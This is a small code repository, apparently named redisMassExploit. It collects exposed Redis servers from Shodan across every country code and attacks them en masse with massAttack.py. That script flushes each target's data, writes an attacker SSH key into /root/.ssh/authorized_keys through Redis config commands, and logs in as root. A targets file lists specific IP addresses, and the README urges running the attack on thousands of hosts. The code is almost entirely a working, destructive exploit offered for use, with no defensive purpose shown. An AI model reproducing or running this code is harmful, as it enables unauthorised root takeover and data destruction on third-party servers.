├── targets ├── README.md ├── shodanCollector.py └── massAttack.py /targets: -------------------------------------------------------------------------------- 1 | 104.131.53.7 2 | 153.92.126.24 3 | 23.95.25.245 4 | 5 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # redisMassExploit 2 | Some handy script to collect hosts installed redis (using Shodan search engine) and exploit them 3 | ##How to use 4 | Using shodanCollector first to get a list of hosts install redis (can collect more than 2000 IP at my execution time). 5 | (I remove most of the hosts in this repo due to security concern) 6 | 7 | Copy the archieved IP list to the "targets" file (in proper format) and run massAttack!!! 8 | -------------------------------------------------------------------------------- /shodanCollector.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | 4 | def getAuthCookies(username, password): 5 | url = 'https://account.shodan.io/login' 6 | data = {'username': username, 'password': password, 'grant_type': 'password', 'login_submit': 'Log in'} 7 | session = requests.Session() 8 | response = session.post(url, data = data) 9 | return session.cookies.get_dict() 10 | 11 | countryList = ['AF', 'AL', 'DZ', 'AS', 'AD', 'AO', 'AI', 'AQ', 'AG', 'AR', 'AM', 'AW', 'AU', 'AT', 'AZ', 'BS', 'BH', 'BD', 'BB', 'BY', 'BE', 'BZ', 'BJ', 'BM', 'BT', 'BO', 'BQ', 'BA', 'BW', 'BV', 'BR', 'IO', 'BN', 'BG', 'BF', 'BI', 'KH', 'CM', 'CA', 'CV', 'KY', 'CF', 'TD', 'CL', 'CN', 'CX', 'CC', 'CO', 'KM', 'CG', 'CD', 'CK', 'CR', 'HR', 'CU', 'CW', 'CY', 'CZ', 'CI', 'DK', 'DJ', 'DM', 'DO', 'EC', 'EG', 'SV', 'GQ', 'ER', 'EE', 'ET', 'FK', 'FO', 'FJ', 'FI', 'FR', 'GF', 'PF', 'TF', 'GA', 'GM', 'GE', 'DE', 'GH', 'GI', 'GR', 'GL', 'GD', 'GP', 'GU', 'GT', 'GG', 'GN', 'GW', 'GY', 'HT', 'HM', 'VA', 'HN', 'HK', 'HU', 'IS', 'IN', 'ID', 'IR', 'IQ', 'IE', 'IM', 'IL', 'IT', 'JM', 'JP', 'JE', 'JO', 'KZ', 'KE', 'KI', 'KP', 'KR', 'KW', 'KG', 'LA', 'LV', 'LB', 'LS', 'LR', 'LY', 'LI', 'LT', 'LU', 'MO', 'MK', 'MG', 'MW', 'MY', 'MV', 'ML', 'MT', 'MH', 'MQ', 'MR', 'MU', 'YT', 'MX', 'FM', 'MD', 'MC', 'MN', 'ME', 'MS', 'MA', 'MZ', 'MM', 'NA', 'NR', 'NP', 'NL', 'NC', 'NZ', 'NI', 'NE', 'NG', 'NU', 'NF', 'MP', 'NO', 'OM', 'PK', 'PW', 'PS', 'PA', 'PG', 'PY', 'PE', 'PH', 'PN', 'PL', 'PT', 'PR', 'QA', 'RO', 'RU', 'RW', 'RE', 'BL', 'SH', 'KN', 'LC', 'MF', 'PM', 'VC', 'WS', 'SM', 'ST', 'SA', 'SN', 'RS', 'SC', 'SL', 'SG', 'SX', 'SK', 'SI', 'SB', 'SO', 'ZA', 'GS', 'SS', 'ES', 'LK', 'SD', 'SR', 'SJ', 'SZ', 'SE', 'CH', 'SY', 'TW', 'TJ', 'TZ', 'TH', 'TL', 'TG', 'TK', 'TO', 'TT', 'TN', 'TR', 'TM', 'TC', 'TV', 'UG', 'UA', 'AE', 'GB', 'US', 'UM', 'UY', 'UZ', 'VU', 'VE', 'VN', 'VG', 'VI', 'WF', 'EH', 'YE', 'ZM', 'ZW', 'AX'] 12 | headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'} 13 | cookies = getAuthCookies('Your Shodan Username', 'Your Shodan Password') 14 | worldIPList = [] 15 | 16 | for country in countryList: 17 | for page in range(1,6): 18 | url = 'https://www.shodan.io/search?query=redis_version country:"{0}"&page={1}'.format(country, page) 19 | r = requests.get(url, headers=headers, cookies=cookies) 20 | content = r.text 21 | 22 | countryIPList = re.findall(r'', content) 23 | if countryIPList == []: 24 | print 'Not found any IP in {0} at page {1}'.format(country, page) 25 | break 26 | else: 27 | print countryIPList 28 | print 'Found {0} IP from {1} in page {2}'.format(len(countryIPList), country, page) 29 | worldIPList = worldIPList + countryIPList 30 | print 'Total number of IP: {0}'.format(len(worldIPList)) 31 | print worldIPList 32 | -------------------------------------------------------------------------------- /massAttack.py: -------------------------------------------------------------------------------- 1 | __author__ = 'Zik' 2 | import subprocess 3 | import socket 4 | import paramiko 5 | 6 | def run_command(command, shellBoolean = False): 7 | try: 8 | if(shellBoolean == False): 9 | out_bytes = subprocess.check_output(command.split()) 10 | if(shellBoolean == True): 11 | out_bytes = subprocess.check_output(command, shell = True) 12 | # out_text = out_bytes.decode('utf-8') 13 | except subprocess.CalledProcessError as e: 14 | out_bytes = e.output # Output generated before error 15 | code = e.returncode # Return code 16 | return out_bytes 17 | 18 | def gererateRSAKey(passphrase): 19 | run_command('rm -rf ./id_rsa ./id_rsa.pub', True) 20 | print run_command('ssh-keygen -t rsa -C "crackRedis" -f ./id_rsa -P {0}'.format(passphrase), True) 21 | run_command('(echo "\\n\\n"; cat ./id_rsa.pub; echo "\\n\\n") > foo.txt', True) 22 | 23 | def attack(target): 24 | print 'Attack the target: ' + target 25 | print 'Flush all the old data...' 26 | print run_command('redis-cli -h {0} flushall'.format(target)) 27 | print 'Push key data to the memory...' 28 | print run_command('cat ./foo.txt | redis-cli -h {0} -x set crackit'.format(target), True) 29 | print 'Set the /root/.ssh/ to current directory...' 30 | print run_command('redis-cli -h {0} config set dir /root/.ssh/'.format(target)) 31 | print 'Get the current dir...' 32 | print run_command('redis-cli -h {0} config get dir'.format(target)) 33 | print 'Set key data to authorized_keys database key..' 34 | print run_command('redis-cli -h {0} config set dbfilename "authorized_keys"'.format(target), True) 35 | print 'Write key data to authorized_keys file...' 36 | print run_command('redis-cli -h {0} save'.format(target)) 37 | 38 | def findPromisingTarget(targets): 39 | promisingTargets = [] 40 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 41 | for target in targets: 42 | command = 'redis-cli -h {0} config set dir /root/.ssh/'.format(target) 43 | if run_command(command).find('OK') != -1: 44 | print '------------------------------------------------------' 45 | print 'Successfully access /root/.ssh/ on ' + target 46 | print 'Test the SSH port of ' + target 47 | try: 48 | s.connect((target, 22)) 49 | print "Success!!!" 50 | s.close() 51 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 52 | promisingTargets.append(target) 53 | print "Number of promising target: " + str(len(promisingTargets)) 54 | except socket.error as e: 55 | print "Error on connect: %s" % e 56 | print '------------------------------------------------------' 57 | s.close() 58 | return promisingTargets 59 | 60 | def SSHConnect(target, passphrase): 61 | ssh = paramiko.SSHClient() 62 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 63 | try: 64 | ssh.connect(target, username='root', password=passphrase, key_filename='./id_rsa') 65 | stdin, stdout, stderr = ssh.exec_command('ls /') 66 | print stdout.readlines() 67 | ssh.close() 68 | return True 69 | except (BadHostKeyException, AuthenticationException, 70 | SSHException, socket.error) as e: 71 | print e 72 | return False 73 | 74 | 75 | def main(): 76 | print '-------------------------GENERATE SSH KEY FILES-------------------------' 77 | passphrase = raw_input('Enter a file passphrase for SSH key: ') 78 | gererateRSAKey(passphrase) 79 | print '------------------------------------------------------------------------' 80 | 81 | print '------------------------FINDING PROMISING TARGETS-----------------------' 82 | targets = [line.rstrip('\r\n') for line in open('targets')] 83 | promisingTargets = findPromisingTarget(targets) 84 | print '------------------------------------------------------------------------' 85 | 86 | print '------------------------ATTACK PROMISING TARGETS------------------------' 87 | pwnedTargets = [] 88 | for promisingTarget in promisingTargets: 89 | print '------------------------------------------------------' 90 | attack(promisingTarget) 91 | print 'Try to connect to target using SSH connection' 92 | if SSHConnect(promisingTarget, passphrase) == True: 93 | pwnedTargets.append(promisingTarget) 94 | print '------------------------------------------------------' 95 | print '-------------------------------------------------------------------------' 96 | 97 | print '---------------------------------SUMMARY---------------------------------' 98 | print 'TOTAL CHECKED TARGETS: {0}'.format(len(targets)) 99 | print 'TOTAL PROMISING TARGETS: {0}'.format(len(promisingTargets)) 100 | print 'TOTAL PWNED TARGETS: {0}'.format(len(pwnedTargets)) 101 | print 'LIST OF ALL PWNED TARGETS:' 102 | for pwnedTarget in pwnedTargets: 103 | print pwnedTarget 104 | print 'Have a nice day!!!' 105 | print '-------------------------------------------------------------------------' 106 | if __name__ == "__main__": 107 | main() --------------------------------------------------------------------------------